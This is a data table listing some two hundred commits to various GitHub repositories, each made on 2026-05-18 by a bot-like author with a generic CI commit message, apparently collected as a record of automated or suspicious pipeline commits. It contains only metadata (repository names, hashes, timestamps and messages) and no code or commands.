| 3571 | Oz-16-Team2/oz_union_16_be_Team2 | 9ed0bb72802e | ci-bot | [email protected] | 2026-05-18T17:01:16.000Z | build: improve ci performance |
| 3572 | Dyybyy/gta | 9f07f3c51f51 | build-bot | [email protected] | 2026-05-18T13:26:43.000Z | ci: add build optimization step |
| 3573 | awesomegoodman/RL_Snake | 9f225abb2ede | ci-bot | [email protected] | 2026-05-18T13:07:21.000Z | build: improve ci performance |
| 3574 | just-abdullah-dev/teezeen | 9f3c6bfcd061 | pipeline-bot | [email protected] | 2026-05-18T13:52:11.000Z | chore: update ci/cd pipeline |
| 3575 | leosouliotis/python_3_11_quarto | 9f51bd1e6abb | build-bot | [email protected] | 2026-05-18T15:41:01.000Z | chore: update ci/cd pipeline |
| 3576 | DekafTheFirst/json-server | 9f52e38358e5 | build-bot | [email protected] | 2026-05-18T12:44:54.000Z | chore: update ci/cd pipeline |
| 3577 | Grzzmine/test-action-1779110815821698624 | 9f5605194516 | auto-ci | [email protected] | 2026-05-18T12:00:56.000Z | chore: sync ci configuration |
| 3578 | trixobird/hashcode | 9f661bb551ac | auto-ci | [email protected] | 2026-05-18T14:45:08.000Z | fix: correct build workflow |
| 3579 | leytomfernando-droid/test-action-1778960008489944739 | 9f71342d933f | ci-bot | [email protected] | 2026-05-18T16:59:30.000Z | chore: optimize pipeline runtime |
| 3580 | amitos80/amitos80.github_io-backup | 9f7c400b0592 | ci-bot | [email protected] | 2026-05-18T13:54:18.000Z | fix: correct build workflow |
| 3581 | Devanshu-code/APP-for-MARs-PROJECT | 9f88315ce0fc | build-bot | [email protected] | 2026-05-18T13:43:03.000Z | ci: add build optimization step |
| 3582 | Debbatisudheer/ReLu-function | 9f8c71621850 | pipeline-bot | [email protected] | 2026-05-18T17:45:05.000Z | build: improve ci performance |
| 3583 | rlaxxwls13/sweepyswipe_backend | 9f931dab25cb | auto-ci | [email protected] | 2026-05-18T13:33:00.000Z | ci: update build config |
| 3584 | usUpal/upals-meditation | 9f9379b35d2d | ci-bot | [email protected] | 2026-05-18T12:29:45.000Z | ci: add build optimization step |
| 3585 | deploy11/Deeplabpuplic-B | 9fad3ee91b9e | ci-bot | [email protected] | 2026-05-18T11:49:38.000Z | chore: sync ci configuration |
| 3586 | PraTiK-2069/The-Journey-of-a-Medieval-knight | 9fb8db64670e | build-bot | [email protected] | 2026-05-18T16:47:28.000Z | ci: add build optimization step |
| 3587 | myssaqil/iris-server-node | 9fbf3ab07f0b | build-bot | [email protected] | 2026-05-18T14:05:11.000Z | chore: optimize pipeline runtime |
| 3588 | binoybkp/fair_income_ride_hailing | 9fc8df0119c0 | build-bot | [email protected] | 2026-05-18T14:04:03.000Z | chore: update ci/cd pipeline |
| 3589 | pranto2051/Next-Js-Figma-Project | a007ec7a7e84 | auto-ci | [email protected] | 2026-05-18T14:10:55.000Z | chore: update ci/cd pipeline |
| 3590 | Tiledesk/tiledesk-docker-proxy | a02deae65af6 | build-bot | [email protected] | 2026-05-18T13:08:41.000Z | chore: update ci/cd pipeline |
| 3591 | ChristianJames-git/DnDShadowlandsHelper | a040f2a8510f | ci-bot | [email protected] | 2026-05-18T15:21:19.000Z | chore: optimize pipeline runtime |
| 3592 | umairabhatti786/Assemble | a04aa4d3ae08 | pipeline-bot | [email protected] | 2026-05-18T13:07:56.000Z | chore: sync ci configuration |
| 3593 | bbarreto96/test-action-1778957958883833181 | a05f3c27d312 | auto-ci | [email protected] | 2026-05-18T16:45:15.000Z | chore: optimize pipeline runtime |
| 3594 | ytlab23/video_editor_portfolio | a0646a8b327d | ci-bot | [email protected] | 2026-05-18T11:46:02.000Z | ci: update build config |
| 3595 | PittVax/trolley | a064ce74dd9a | build-bot | [email protected] | 2026-05-18T12:42:20.000Z | ci: add build optimization step |
| 3596 | varunvaghasiya11/Day-6-challange | a0682e129034 | pipeline-bot | [email protected] | 2026-05-18T13:54:27.000Z | ci: add build optimization step |
| 3597 | LynxJackal/web-check-free | a068f1de30e0 | auto-ci | [email protected] | 2026-05-18T15:33:50.000Z | fix: correct build workflow |
| 3598 | Dejlof/CommunityForumWebApi | a069193e9944 | ci-bot | [email protected] | 2026-05-18T15:55:06.000Z | chore: sync ci configuration |
| 3599 | jongsun-park/ops | a06ba2125c0c | auto-ci | [email protected] | 2026-05-18T16:18:30.000Z | ci: update build config |
| 3600 | Yamada731/Week-3 | a06bf21b3db8 | build-bot | [email protected] | 2026-05-18T13:55:28.000Z | ci: add build optimization step |
| 3601 | Raja244/WedSpark | a08ea1e90238 | build-bot | [email protected] | 2026-05-18T15:42:27.000Z | ci: update build config |
| 3602 | pranto2051/astro_project_01 | a090d00323c9 | ci-bot | [email protected] | 2026-05-18T13:56:09.000Z | fix: correct build workflow |
| 3603 | BryanAlexanderSantoso/React-Web-Movie | a09bc7ee602a | ci-bot | [email protected] | 2026-05-18T13:56:20.000Z | build: improve ci performance |
| 3604 | akashcruz/daily-diary-management-system | a0a93439f36a | pipeline-bot | [email protected] | 2026-05-18T13:05:24.000Z | ci: update build config |
| 3605 | David-Irihose/alu-shell | a0b1cd839a91 | auto-ci | [email protected] | 2026-05-18T13:28:26.000Z | chore: optimize pipeline runtime |
| 3606 | deploy11/skb | a0b26f0d284b | build-bot | [email protected] | 2026-05-18T11:52:34.000Z | build: improve ci performance |
| 3607 | myssaqil/needworkdb-Website--Api | a0c6e0eb8e9d | auto-ci | [email protected] | 2026-05-18T14:16:32.000Z | build: improve ci performance |
| 3608 | VrajPatelK/task-management-frontend | a0c6e53b6d96 | build-bot | [email protected] | 2026-05-18T12:45:10.000Z | ci: add build optimization step |
| 3609 | Wiznet/io6Library | a0d6ab571e72 | auto-ci | [email protected] | 2026-05-18T16:31:22.000Z | build: improve ci performance |
| 3610 | cenervpn-net/vpn-gateway | a0e69168a73f | auto-ci | [email protected] | 2026-05-18T16:38:30.000Z | fix: correct build workflow |
| 3611 | AmarKumarShaw/strapi_deployment | a0e974c5c89d | auto-ci | [email protected] | 2026-05-18T12:15:42.000Z | ci: update build config |
| 3612 | codedecode25/SwaggerImplementation | a0edf25df06a | pipeline-bot | [email protected] | 2026-05-18T17:23:25.000Z | chore: optimize pipeline runtime |
| 3613 | Kalaganov-Konstantin/review_form | a114613acdc3 | pipeline-bot | [email protected] | 2026-05-18T13:45:54.000Z | ci: update build config |
| 3614 | blerdon/CaisseEnregistreuse | a1161dac2f68 | auto-ci | [email protected] | 2026-05-18T12:38:38.000Z | chore: update ci/cd pipeline |
| 3615 | smit-sk/African-Animal | a11bbf13e6ac | auto-ci | [email protected] | 2026-05-18T16:13:21.000Z | chore: update ci/cd pipeline |
| 3616 | alanmunoz25/Drupal-Headless-CMS | a11c77107ba6 | ci-bot | [email protected] | 2026-05-18T14:27:38.000Z | chore: sync ci configuration |
| 3617 | MR-AYAN-CHOWDHURY/IDOLL-PROJECT | a11cd4213e58 | auto-ci | [email protected] | 2026-05-18T11:42:45.000Z | chore: optimize pipeline runtime |
| 3618 | sahidDev09/Medi-Nova-server-MERN | a1206271aca4 | auto-ci | [email protected] | 2026-05-18T16:09:08.000Z | build: improve ci performance |
| 3619 | Shirley940613/haohao1140613.Github.io | a126bbc7354a | auto-ci | [email protected] | 2026-05-18T13:57:14.000Z | chore: sync ci configuration |
| 3620 | akhill4054/GG-Trainer-web | a131a9b180f7 | ci-bot | [email protected] | 2026-05-18T16:32:55.000Z | chore: sync ci configuration |
| 3621 | vrct07/curso-html-css | a13f8f51e68c | auto-ci | [email protected] | 2026-05-18T14:26:32.000Z | ci: update build config |
| 3622 | pranto2051/My_Shop_2 | a1404a3a6d66 | auto-ci | [email protected] | 2026-05-18T14:05:52.000Z | fix: correct build workflow |
| 3623 | Wookie3/life-line | a149a56a6fea | pipeline-bot | [email protected] | 2026-05-18T16:30:16.000Z | ci: add build optimization step |
| 3624 | diavanda/UI-Diavanda | a16331a01c0f | pipeline-bot | [email protected] | 2026-05-18T12:35:52.000Z | ci: update build config |
| 3625 | revel-um/just-fun | a1642e315782 | pipeline-bot | [email protected] | 2026-05-18T12:13:11.000Z | ci: update build config |
| 3626 | mirfanjazuli/qi-wedding | a1660e20331e | auto-ci | [email protected] | 2026-05-18T16:36:35.000Z | chore: update ci/cd pipeline |
| 3627 | andersonphiri/githubclient_flutter | a17d95b420c5 | build-bot | [email protected] | 2026-05-18T13:55:35.000Z | ci: update build config |
| 3628 | RameshRukshan/5-Games-Made-Using-Programming-Data-Structures-Algorithms | a1890db1cad2 | pipeline-bot | [email protected] | 2026-05-18T17:21:52.000Z | chore: sync ci configuration |
| 3629 | shivanshu-pietechsolutions/github-demo | a18d328ce047 | build-bot | [email protected] | 2026-05-18T12:46:58.000Z | chore: optimize pipeline runtime |
| 3630 | andersonphiri/erlangconcepts | a1921d0650f7 | ci-bot | [email protected] | 2026-05-18T13:53:27.000Z | fix: correct build workflow |
| 3631 | yashlad27/ysl-portfolio | a19f271ec0bb | build-bot | [email protected] | 2026-05-18T13:26:52.000Z | fix: correct build workflow |
| 3632 | jaff0040/test-action-1779106619648949121 | a1a0e44e1884 | ci-bot | [email protected] | 2026-05-18T16:58:13.000Z | chore: sync ci configuration |
| 3633 | ammadey7/os-worksheet-2 | a1a26f547abc | build-bot | [email protected] | 2026-05-18T13:13:29.000Z | chore: optimize pipeline runtime |
| 3634 | Debbatisudheer/ML-optimisation-Differences | a1aa1d7ea83f | ci-bot | [email protected] | 2026-05-18T17:34:17.000Z | chore: optimize pipeline runtime |
| 3635 | rahulbohra57/Neural-Networks-Image-Recognition-v1 | a1b3b7a79bfe | pipeline-bot | [email protected] | 2026-05-18T16:34:48.000Z | ci: add build optimization step |
| 3636 | assiljaby/go-ledger-backend | a1bb03b1ad1c | build-bot | [email protected] | 2026-05-18T13:03:43.000Z | chore: optimize pipeline runtime |
| 3637 | Black-Iron-Project/packages_services_OmniJaws | a1cf4a5ddde2 | pipeline-bot | [email protected] | 2026-05-18T17:41:08.000Z | fix: correct build workflow |
| 3638 | cybxrrgsouraabh/Paytm-Clone | a1d19caab605 | pipeline-bot | [email protected] | 2026-05-18T12:16:43.000Z | fix: correct build workflow |
| 3639 | Don-Antonio18/comp2140-kiserve-management | a1f6a3adc369 | pipeline-bot | [email protected] | 2026-05-18T15:36:35.000Z | fix: correct build workflow |
| 3640 | nnfuad/DL_SentimentAnalysis | a1f8ff1dc858 | auto-ci | [email protected] | 2026-05-18T13:27:44.000Z | ci: add build optimization step |
| 3641 | anshvarma07/BvpHacks | a1fcca0c9295 | pipeline-bot | [email protected] | 2026-05-18T13:38:04.000Z | ci: update build config |
| 3642 | smannic/voxflow-codex | a201921dbbf0 | auto-ci | [email protected] | 2026-05-18T11:48:43.000Z | ci: update build config |
| 3643 | deploy11/magablog | a21dcc6a6f27 | pipeline-bot | [email protected] | 2026-05-18T11:53:55.000Z | ci: add build optimization step |
| 3644 | maheshchonde89-ctrl/test-action-1778960691881303946 | a22ae8bc25f9 | auto-ci | [email protected] | 2026-05-18T12:49:04.000Z | build: improve ci performance |
| 3645 | DipeshSinghNegi/ApplyPilot | a23579f07027 | ci-bot | [email protected] | 2026-05-18T12:12:15.000Z | ci: add build optimization step |
| 3646 | julianarmando/Radio3HP | a237679314d3 | build-bot | [email protected] | 2026-05-18T13:52:15.000Z | fix: correct build workflow |
| 3647 | Mohan2200031661/ML_Model_Used_Car_Price | a239c9869156 | ci-bot | [email protected] | 2026-05-18T12:57:59.000Z | chore: optimize pipeline runtime |
| 3648 | yashlad27/TY-Sem2 | a253e0b57385 | build-bot | [email protected] | 2026-05-18T13:31:32.000Z | chore: update ci/cd pipeline |
| 3649 | Lakshay122/Product_curd_operation | a27d5f92443a | auto-ci | [email protected] | 2026-05-18T12:28:04.000Z | build: improve ci performance |
| 3650 | nuketuna1101/TowerDefenseTCP | a293607c9ff8 | build-bot | [email protected] | 2026-05-18T12:00:07.000Z | fix: correct build workflow |
| 3651 | ThecodingShef/DroidStack-Template | a29dc436b867 | pipeline-bot | [email protected] | 2026-05-18T13:13:41.000Z | build: improve ci performance |
| 3652 | Exp-Primer-Copilot-Cohort-1/experience-primer-copilot-Tony-Milukov | a2a7f57c4003 | pipeline-bot | [email protected] | 2026-05-18T12:17:24.000Z | ci: add build optimization step |
| 3653 | bbarreto96/test-action-1779100547251485895 | a2b52f967b4a | ci-bot | [email protected] | 2026-05-18T16:42:03.000Z | fix: correct build workflow |
| 3654 | Sushanth18052005/ML | a2b76f7d3f87 | pipeline-bot | [email protected] | 2026-05-18T12:00:56.000Z | ci: add build optimization step |
| 3655 | edrichard/test-action-1778244097898031900 | a2b985482684 | pipeline-bot | [email protected] | 2026-05-18T15:39:39.000Z | chore: update ci/cd pipeline |
| 3656 | serena0322/Musicboxd | a2c1ee0410db | build-bot | [email protected] | 2026-05-18T12:55:21.000Z | chore: sync ci configuration |
| 3657 | Akisan98/Computas | a2cbc01f4264 | build-bot | [email protected] | 2026-05-18T14:03:16.000Z | chore: optimize pipeline runtime |
| 3658 | websystemspl/BookmarkAI-chrome-plugin | a2d6976959c6 | auto-ci | [email protected] | 2026-05-18T15:03:20.000Z | chore: update ci/cd pipeline |
| 3659 | ShaileshS237/calculator | a2dd828df068 | pipeline-bot | [email protected] | 2026-05-18T16:57:34.000Z | ci: update build config |
| 3660 | LuciferVid/Chess | a2e9340ad770 | ci-bot | [email protected] | 2026-05-18T12:05:35.000Z | ci: add build optimization step |
| 3661 | karanclaude/bakedesk-equip-site | a2f0d52340a7 | build-bot | [email protected] | 2026-05-18T15:10:17.000Z | chore: sync ci configuration |
| 3662 | Lhagvaa0102/Css-animation | a2f7cd6d2e08 | build-bot | [email protected] | 2026-05-18T15:51:45.000Z | chore: sync ci configuration |
| 3663 | moritzl97/SimpleMaze-group5 | a30768289eab | build-bot | [email protected] | 2026-05-18T13:52:48.000Z | chore: sync ci configuration |
| 3664 | Owolabi5541/backend | a32fdf8f231c | build-bot | [email protected] | 2026-05-18T13:55:09.000Z | chore: sync ci configuration |
| 3665 | lollounicam/IDSproject | a33694c79762 | pipeline-bot | [email protected] | 2026-05-18T16:54:31.000Z | chore: optimize pipeline runtime |
| 3666 | praktikum-java/m1-t23-junit | a337d5242874 | pipeline-bot | [email protected] | 2026-05-18T13:52:09.000Z | fix: correct build workflow |
| 3667 | anshvarma07/tailwindone | a3455051b060 | ci-bot | [email protected] | 2026-05-18T13:36:05.000Z | chore: sync ci configuration |
| 3668 | ARISTOTLE777/OutletCompass | a34a569aa113 | ci-bot | [email protected] | 2026-05-18T13:31:37.000Z | chore: sync ci configuration |
| 3669 | HamzaElMkhantar/Clone-Youtube-responsive- | a35143fef2ba | build-bot | [email protected] | 2026-05-18T17:19:03.000Z | fix: correct build workflow |
| 3670 | Harshit2510745/FS-INTEGRATION-3 | a355ef016ca0 | build-bot | [email protected] | 2026-05-18T13:00:16.000Z | build: improve ci performance |
| 3671 | l8yh1/Jarvis | a35ee06ed52f | ci-bot | [email protected] | 2026-05-18T17:11:42.000Z | ci: add build optimization step |
| 3672 | mukesh682/mukesh682 | a36e431cfd50 | build-bot | [email protected] | 2026-05-18T12:16:46.000Z | chore: optimize pipeline runtime |
| 3673 | Stat184-Spring2025/Sec4_FP_Eurus_Jiongrong | a3709dd9fc45 | ci-bot | [email protected] | 2026-05-18T12:16:43.000Z | build: improve ci performance |
| 3674 | guimmamanna/contract-first-api-quality | a37c247e893f | build-bot | [email protected] | 2026-05-18T13:02:14.000Z | ci: update build config |
| 3675 | assiljaby/nextjs-dashboard | a37ee6b16537 | pipeline-bot | [email protected] | 2026-05-18T13:04:08.000Z | chore: optimize pipeline runtime |
| 3676 | ranganaamarathunge/test-action-1779110817022113900 | a37f3b65202a | pipeline-bot | [email protected] | 2026-05-18T13:29:14.000Z | ci: add build optimization step |
| 3677 | b1kaf7/Data-Structure-and-Algorithms | a37f41dfc1a9 | pipeline-bot | [email protected] | 2026-05-18T15:28:39.000Z | chore: sync ci configuration |
| 3678 | krowslyare/morapack-frontend | a383d2b3a732 | build-bot | [email protected] | 2026-05-18T12:36:27.000Z | build: improve ci performance |
| 3679 | tnk1204/portfolio | a394af832cd3 | ci-bot | [email protected] | 2026-05-18T16:59:44.000Z | ci: update build config |
| 3680 | akhill4054/live-stream-backend | a3a9e1050938 | build-bot | [email protected] | 2026-05-18T16:33:23.000Z | ci: update build config |
| 3681 | bbarreto96/bbarreto96 | a3aecce10403 | ci-bot | [email protected] | 2026-05-18T16:51:53.000Z | chore: update ci/cd pipeline |
| 3682 | JoseIvanPicado/Sistema-de-Registro-Acad-mico | a3b84b139e45 | auto-ci | [email protected] | 2026-05-18T12:08:56.000Z | ci: update build config |
| 3683 | sahidDev09/ArtSync-server | a3c555169330 | pipeline-bot | [email protected] | 2026-05-18T16:10:28.000Z | chore: update ci/cd pipeline |
| 3684 | mesahub-db/.github | a3f572ffbeb4 | ci-bot | [email protected] | 2026-05-18T13:58:15.000Z | chore: update ci/cd pipeline |
| 3685 | DekafTheFirst/Task-Management | a3f805490a60 | auto-ci | [email protected] | 2026-05-18T12:42:50.000Z | ci: add build optimization step |
| 3686 | Ashwiin/Exploratory-Data-Analysis-for-Data-Visualization | a40669a2c6f1 | pipeline-bot | [email protected] | 2026-05-18T16:52:17.000Z | chore: sync ci configuration |
| 3687 | RuchirKadam1729/tccm-app | a410dafbf3f1 | pipeline-bot | [email protected] | 2026-05-18T12:56:10.000Z | build: improve ci performance |
| 3688 | GrupoEcoquintas/pago-app | a43303c001bb | pipeline-bot | [email protected] | 2026-05-18T14:28:13.000Z | ci: update build config |
| 3689 | AsifAhmedAli/Mark-dez | a4493b5af64d | auto-ci | [email protected] | 2026-05-18T13:33:38.000Z | chore: sync ci configuration |
| 3690 | Warit314/TheLayerCake | a455b4cd7319 | build-bot | [email protected] | 2026-05-18T16:42:28.000Z | chore: sync ci configuration |
| 3691 | AmarKumarShaw/next_js_mastery_e_commerce | a45a7d92553a | build-bot | [email protected] | 2026-05-18T12:15:13.000Z | fix: correct build workflow |
| 3692 | Debbatisudheer/dropout-rate | a4748b2c9a0f | auto-ci | [email protected] | 2026-05-18T17:40:46.000Z | build: improve ci performance |
| 3693 | gioeste/flashloanbnb | a47b80f6d24a | build-bot | [email protected] | 2026-05-18T13:05:39.000Z | chore: optimize pipeline runtime |
| 3694 | Dyybyy/test-action-1779119165308439793 | a47d9a46d7ec | build-bot | [email protected] | 2026-05-18T13:20:25.000Z | chore: sync ci configuration |
| 3695 | mosesnkoromo/ict_education_old_repo | a495437849d0 | ci-bot | [email protected] | 2026-05-18T13:15:20.000Z | build: improve ci performance |
| 3696 | adeelcheeema/urdu_story_generation | a496d880b440 | auto-ci | [email protected] | 2026-05-18T13:10:14.000Z | ci: update build config |
| 3697 | AnthonyMuneneAM/schatzzz | a4a78331f24a | ci-bot | [email protected] | 2026-05-18T13:34:56.000Z | chore: optimize pipeline runtime |
| 3698 | USAFA-HAVOC/FalconNet | a4b5ef64809c | ci-bot | [email protected] | 2026-05-18T16:24:32.000Z | ci: update build config |
| 3699 | Debbatisudheer/stack-undo-redo | a4b8b19fd020 | build-bot | [email protected] | 2026-05-18T17:38:54.000Z | build: improve ci performance |
| 3700 | pranto2051/Clone-Website | a4b9fae47283 | auto-ci | [email protected] | 2026-05-18T14:14:38.000Z | build: improve ci performance |
| 3701 | Skypieee6/AIVANTA | a4ba435771fe | auto-ci | [email protected] | 2026-05-18T14:32:59.000Z | chore: update ci/cd pipeline |
| 3702 | Warshaman/build-pipeline | a4ba5b91fabf | ci-bot | [email protected] | 2026-05-18T11:40:33.000Z | ci: add build optimization step |
| 3703 | Gopikrishna54321/test-action-1778959304127995465 | a4d2f09465ea | auto-ci | [email protected] | 2026-05-18T16:32:53.000Z | ci: update build config |
| 3704 | whyoolw/whyflake | a4f089b688af | pipeline-bot | [email protected] | 2026-05-18T12:34:57.000Z | fix: correct build workflow |
| 3705 | smit-sk/Pinch-iOS | a4f736aa1da6 | pipeline-bot | [email protected] | 2026-05-18T16:13:47.000Z | chore: update ci/cd pipeline |
| 3706 | mobtomc/bicaps | a505b5bafb67 | auto-ci | [email protected] | 2026-05-18T13:37:06.000Z | chore: sync ci configuration |
| 3707 | Luanderson-777/Pagina-de-Receita | a5073db3f92c | build-bot | [email protected] | 2026-05-18T12:55:33.000Z | chore: update ci/cd pipeline |
| 3708 | SaraNabil/personal_expenses_app | a516b6664245 | pipeline-bot | [email protected] | 2026-05-18T16:10:14.000Z | fix: correct build workflow |
| 3709 | jamaican999/AIML-PYTHON | a5171baebbf8 | pipeline-bot | [email protected] | 2026-05-18T13:35:37.000Z | ci: update build config |
| 3710 | jamaican999/CTE_POC | a518ce0cc0b8 | ci-bot | [email protected] | 2026-05-18T13:35:16.000Z | ci: add build optimization step |
| 3711 | S-Abrar/Weather-App | a52ecb803816 | ci-bot | [email protected] | 2026-05-18T12:55:55.000Z | ci: add build optimization step |
| 3712 | chicoluan/scanner-parameter | a530eeb972ea | auto-ci | [email protected] | 2026-05-18T12:26:20.000Z | fix: correct build workflow |
| 3713 | jongsun-park/udemy_shopify_demo | a53b87c7e41f | build-bot | [email protected] | 2026-05-18T16:18:16.000Z | ci: update build config |
| 3714 | cloudyape/Naruto | a53fcb278a74 | ci-bot | [email protected] | 2026-05-18T16:26:54.000Z | chore: sync ci configuration |
| 3715 | indigo-virtual/indigo-virtual-wallpapers | a54d0d2b78ff | pipeline-bot | [email protected] | 2026-05-18T16:14:17.000Z | fix: correct build workflow |
| 3716 | phonephachan/App | a54d96fcf7bc | ci-bot | [email protected] | 2026-05-18T12:12:49.000Z | ci: add build optimization step |
| 3717 | cslant/dev-docker-images | a5516dfa326e | build-bot | [email protected] | 2026-05-18T16:33:52.000Z | chore: sync ci configuration |
| 3718 | RobertLlb/potree-aps-view | a5533f29c06b | pipeline-bot | [email protected] | 2026-05-18T14:33:41.000Z | chore: update ci/cd pipeline |
| 3719 | akhill4054/android-Joystick-control-app-for-bluetooth-car-Kotlin | a57e6a7de54b | ci-bot | [email protected] | 2026-05-18T16:35:26.000Z | fix: correct build workflow |
| 3720 | zaunere/mulch | a593233c3938 | pipeline-bot | [email protected] | 2026-05-18T13:34:03.000Z | chore: update ci/cd pipeline |
| 3721 | itsmyfox/FoxVPN | a5aa2abb4ca4 | auto-ci | [email protected] | 2026-05-18T14:47:59.000Z | chore: sync ci configuration |
| 3722 | igorKopylov/sml_test_task | a5b163007608 | ci-bot | [email protected] | 2026-05-18T13:24:33.000Z | chore: sync ci configuration |
| 3723 | CreativeMasterBonin/thingamajigsrailroadways | a5b7add912f9 | pipeline-bot | [email protected] | 2026-05-18T14:01:35.000Z | chore: optimize pipeline runtime |
| 3724 | SahilVGite/Space-Tourism-Website | a5bbe980d831 | auto-ci | [email protected] | 2026-05-18T12:21:27.000Z | build: improve ci performance |
| 3725 | Debbatisudheer/decorator | a5d05b1e1072 | ci-bot | [email protected] | 2026-05-18T17:44:46.000Z | build: improve ci performance |
| 3726 | simonebonusoo/bns-studio | a5d06e5b3d75 | auto-ci | [email protected] | 2026-05-18T13:18:24.000Z | build: improve ci performance |
| 3727 | rahulbohra57/hr-attendance-system | a5de856b72a4 | build-bot | [email protected] | 2026-05-18T16:31:23.000Z | chore: update ci/cd pipeline |
| 3728 | Stat184-Spring2025/Stat-184-Project | a5e26a5ce2b2 | build-bot | [email protected] | 2026-05-18T12:11:40.000Z | build: improve ci performance |
| 3729 | Presentech001/jeweller | a60fd4b84253 | auto-ci | [email protected] | 2026-05-18T13:55:52.000Z | chore: sync ci configuration |
| 3730 | varunvaghasiya11/React_counter | a619b545884b | build-bot | [email protected] | 2026-05-18T13:55:49.000Z | ci: add build optimization step |
| 3731 | cybxrrgsouraabh/StarBucks-HomePage | a61a95e470c0 | ci-bot | [email protected] | 2026-05-18T12:16:18.000Z | chore: optimize pipeline runtime |
| 3732 | HamzaElMkhantar/photographer-portfolio | a6240a69c22d | auto-ci | [email protected] | 2026-05-18T17:23:25.000Z | fix: correct build workflow |
| 3733 | SaiDheeraj-19/Wave | a62da11c65b4 | pipeline-bot | [email protected] | 2026-05-18T15:49:32.000Z | chore: sync ci configuration |
| 3734 | matir-bank/matirbank-android | a631dad5663a | ci-bot | [email protected] | 2026-05-18T15:39:29.000Z | chore: update ci/cd pipeline |
| 3735 | ANDREWTENAJEROS/tenajeros-030217 | a643afe11d06 | auto-ci | [email protected] | 2026-05-18T16:14:13.000Z | chore: sync ci configuration |
| 3736 | Husam-AbuZina/test-action-1779100547028162696 | a644f91c7bb0 | auto-ci | [email protected] | 2026-05-18T12:09:30.000Z | chore: update ci/cd pipeline |
| 3737 | ho-cyber/CanvasRead | a6514d21f7a0 | ci-bot | [email protected] | 2026-05-18T17:19:41.000Z | chore: optimize pipeline runtime |
| 3738 | batnano/test-action-fe825706ccdb | a65cbbaece48 | auto-ci | [email protected] | 2026-05-18T15:26:33.000Z | build: improve ci performance |
| 3739 | DekafTheFirst/Lil_dtk | a6680ad33cf1 | build-bot | [email protected] | 2026-05-18T12:45:38.000Z | chore: update ci/cd pipeline |
| 3740 | 0xdps/fake-stack | a67a3aa57018 | build-bot | [email protected] | 2026-05-18T13:59:56.000Z | ci: update build config |
| 3741 | NicolNonga/voto_api | a67f1c3883e5 | pipeline-bot | [email protected] | 2026-05-18T12:21:21.000Z | chore: update ci/cd pipeline |
| 3742 | Exp-Primer-Copilot-Cohort-1/experience-primer-copilot-Horldsence | a685f99bac64 | auto-ci | [email protected] | 2026-05-18T13:19:00.000Z | chore: sync ci configuration |
| 3743 | Asultop/AsulASync | a689fa75417c | build-bot | [email protected] | 2026-05-18T12:24:01.000Z | chore: optimize pipeline runtime |
| 3744 | Shillerx/CodeCraft4 | a69157d01986 | build-bot | [email protected] | 2026-05-18T12:33:22.000Z | fix: correct build workflow |
| 3745 | govindchintapalli/olpc-acoustic-measure-activity | a6cccadb96a9 | build-bot | [email protected] | 2026-05-18T13:46:28.000Z | chore: optimize pipeline runtime |
| 3746 | theabelchannel/Taller-03 | a6cff47e8953 | build-bot | [email protected] | 2026-05-18T13:23:20.000Z | chore: update ci/cd pipeline |
| 3747 | muhammadhammadd7/test-action-1779100547027717714 | a6daeef87a2a | pipeline-bot | [email protected] | 2026-05-18T13:36:09.000Z | chore: update ci/cd pipeline |
| 3748 | sousasantos/personal-page | a7038c4625e0 | auto-ci | [email protected] | 2026-05-18T14:15:03.000Z | build: improve ci performance |
| 3749 | Habeebopeyemi/fraudengine | a7052f61e52b | auto-ci | [email protected] | 2026-05-18T15:59:57.000Z | ci: add build optimization step |
| 3750 | jnrveneracion/vehicle-repair-and-maintenance-management-system | a706de9c6ddf | pipeline-bot | [email protected] | 2026-05-18T13:11:48.000Z | fix: correct build workflow |
| 3751 | ShaileshS237/talent-hive | a70803c9b2b1 | pipeline-bot | [email protected] | 2026-05-18T16:52:43.000Z | chore: sync ci configuration |
| 3752 | ho-cyber/happy-birthday | a70d707a982d | ci-bot | [email protected] | 2026-05-18T17:21:35.000Z | chore: update ci/cd pipeline |
| 3753 | MaximKabaev/DiscordBot | a71bab44137d | ci-bot | [email protected] | 2026-05-18T14:33:05.000Z | ci: update build config |
| 3754 | BienG3Rd/civicConnect2 | a71e732e9aaf | ci-bot | [email protected] | 2026-05-18T16:19:38.000Z | fix: correct build workflow |
| 3755 | Heseela/Hiresphere_Frontend | a722de79fecb | build-bot | [email protected] | 2026-05-18T12:13:07.000Z | ci: add build optimization step |
| 3756 | jhvisuals/posrtfolio-images | a72bf02c05de | pipeline-bot | [email protected] | 2026-05-18T17:12:00.000Z | ci: add build optimization step |
| 3757 | Udbhav-2025/udbhav-ht100ml024 | a73ee9d92f40 | pipeline-bot | [email protected] | 2026-05-18T13:06:09.000Z | fix: correct build workflow |
| 3758 | arj1211/neuroevosim | a7536fd44380 | pipeline-bot | [email protected] | 2026-05-18T15:40:57.000Z | fix: correct build workflow |
| 3759 | Ediekkhan/medical_Dashboard | a755ea66c870 | ci-bot | [email protected] | 2026-05-18T13:44:15.000Z | build: improve ci performance |
| 3760 | riomukhtarom/covid-app | a758a5f89cdc | ci-bot | [email protected] | 2026-05-18T15:42:28.000Z | ci: add build optimization step |
| 3761 | b1kaf7/HTML | a75a9bf3c301 | pipeline-bot | [email protected] | 2026-05-18T15:28:29.000Z | chore: optimize pipeline runtime |
| 3762 | muhammadhammadd7/poc_location_tracking | a75b11b50294 | build-bot | [email protected] | 2026-05-18T13:37:22.000Z | fix: correct build workflow |
| 3763 | raulromeroruiz/landing-page | a770e7906804 | ci-bot | [email protected] | 2026-05-18T15:50:20.000Z | ci: add build optimization step |
| 3764 | IracyMaia/PollinatorSearch | a79cb36fd89d | build-bot | [email protected] | 2026-05-18T14:08:53.000Z | chore: update ci/cd pipeline |
| 3765 | asifaminisonline/Morse-Code-Decoder | a7ad1c00a2bd | auto-ci | [email protected] | 2026-05-18T12:28:27.000Z | chore: optimize pipeline runtime |
| 3766 | Idovic/Biblecast | a7b69afe28e4 | pipeline-bot | [email protected] | 2026-05-18T13:08:49.000Z | ci: add build optimization step |
| 3767 | Koshish-Khadka/Traffic-Management-System- | a7d89263b206 | build-bot | [email protected] | 2026-05-18T16:14:12.000Z | ci: update build config |
| 3768 | nmschoolcraft/square-one | a7d9a11aab5a | build-bot | [email protected] | 2026-05-18T11:42:44.000Z | chore: optimize pipeline runtime |
| 3769 | Udbhav-2025/udbhav-ht100-ga-033 | a7da1076eb5a | ci-bot | [email protected] | 2026-05-18T13:08:27.000Z | ci: add build optimization step |
| 3770 | pranto2051/my_libery | a7e4645d4f94 | ci-bot | [email protected] | 2026-05-18T14:14:25.000Z | build: improve ci performance |
